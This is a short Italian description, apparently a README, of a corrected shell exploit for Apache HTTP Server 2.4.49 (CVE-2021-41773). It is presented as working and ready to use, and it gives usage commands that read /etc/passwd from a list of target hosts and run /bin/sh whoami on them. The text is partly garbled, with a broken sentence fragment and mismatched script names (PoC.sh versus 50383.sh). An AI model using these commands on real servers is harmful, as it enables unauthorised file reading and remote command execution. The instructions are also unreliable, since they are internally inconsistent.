
Exploit shell corretto per Apache HTTP Server 2.4.49 CVE-2021-41773 path traversal e vulnerabilità di esecuzione remota di codice. Legge file arbitrari ed esegue comandi su target vulnerabili.
Questo è un exploit per la vulnerabilità di Apache HTTP Server 2.4.49 identificata come CVE-2021-41773. La versione originale dell'exploit pubblicata su Exploit-DB conteneva errori di sintassi e di esecuzione, pertanto questa versione è stata corretta per garantirne il corretto funzionamento in ambienti Linux.
if.for per assicurarne la corretta esecuzione.chmod +x PoC.sh
./50383.sh targets.txt /etc/passwd
targets.txt (lista di obiettivi):http://192.168.1.100
http://vulnerable-site.com
/etc/passwd:./50383.sh targets.txt /etc/passwd
./50383.sh targets.txt /bin/sh whoami